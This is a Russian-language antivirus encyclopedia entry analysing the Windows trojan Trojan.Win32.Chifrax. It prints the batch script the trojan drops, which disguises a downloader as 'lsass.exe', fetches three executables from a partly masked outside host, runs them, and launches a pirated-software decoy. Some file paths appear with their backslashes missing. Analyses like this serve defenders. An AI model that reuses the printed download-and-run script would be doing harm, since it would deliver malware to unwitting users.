Trojan.Win32.Chifrax

Родительский класс: TrojWare

Вредоносные программы, которые осуществляют несанкционированные пользователем действия: уничтожают, блокируют, модифицируют или копируют информацию, нарушают работу компьютеров или компьютерных сетей. В отличие от вирусов и червей, представители этой категории не умеют создавать свои копии, не способны к самовоспроизведению.

Класс: Trojan

Вредоносная программа, занимающаяся уничтожением, блокированием, модификацией или копированием информации, нарушением работы компьютеров или компьютерных сетей, и при этом не попавшая ни в один из классов троянских программ.

Подробнее

Платформа: Win32

Win32 - платформа, управляемая операционной системой на базе Windows NT (Windows XP, Windows 7 и т.д.), позволяющей исполнять 32-битные приложения. В настоящее время данная платформа является одной из наиболее распространенных.

Описание

После запуска троянец выполняет следующие действия:

• извлекает из своего тела файлы, которые сохраняются в каталоге хранения временных файлов текущего пользователя как

  %Temp%IXP000.TMPlsass.exe (118784 байта)
  %Temp%IXP000.TMPw.bat (49 байт)
  
  

  Сценарий содержит следующие строки:

  @echo off
  %SystemRoot%System32cmd.exe /C r.bat
  %Temp%IXP000.TMPr.bat (567 байт)
  
  

  Сценарий содержит следующие строки:

  
  @echo off
  ren lsass lsass.exe
  start "" "sony.vegas.pro.80b.build.217-nope.exe"
  net start bits

  IF NOT EXIST C:nul mkdir C:
  lsass.exe /transfer jman /download /priority high 
  http://bulg***ave.com/ic3.exe "C:ecic3.exe"
  
  IF NOT EXIST C:nul mkdir C:
  lsass.exe /transfer jman /download /priority high 
  http://bulg***ave.com/IC.exe "C:exic.exe"
  
  IF NOT EXIST C:nul mkdir C:
  lsass.exe /transfer jman /download /priority high 
  http://bulg***ave.com/db.exe "C:exdb.exe"
  
  start "" "C:ecic3.exe"
  
  start "" "C:exic.exe"
  
  start "" "C:exdb.exe"
  
  %Temp%IXP000.TMPsony.vegas.pro.80b.build.217-nope.exe (69521 байт)
  
  

• Создает ключ системного реестра:

  
  [HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnce]
  
  
  
  "wextract_cleanup0" = "rundll32.exe %System%advpack.dll,
  DelNodeRunDLL32 "%Temp%IXP000.TMP""
  
  
  
  

  Таким образом, при следующем старте системы каталог "%Temp%IXP000.TMP" будет удален.
• Запускает на выполнение ранее созданный сценарий "w.bat", в свою очередь запускающий "r.bat".

После этого троянец завершает свою работу. Запуск сценария "r.bat" приводит к выполнению следующих действий:

• запускается на выполнение файл "sony.vegas.pro.80b.build.217-nope.exe".
• При помощи созданного троянцем файла "lsass.exe" из сети Интернет загружаются файлы по следующим ссылкам:

  
  http://bulg***ave.com/ic3.exe
  
  
  
  http://bulg***ave.com/IC.exe
  
  
  
  http://bulg***ave.com/db.exe
  
  
  
  

  Загруженные файлы сохраняются в корневом каталоге диска C: соответственно под следующими именами:

  
  C:ecic3.exe
  
  
  
  C:exic.exe
  
  
  
  C:exdb.exe
  
  
  
  

  На момент создания описания по всем приведенным ссылкам загружалась html-страница следующего содержания:
• Загруженные файлы запускаются на выполнение.

Смотрите также

Узнай статистику распространения уязвимостей в своем регионе statistics.securelist.com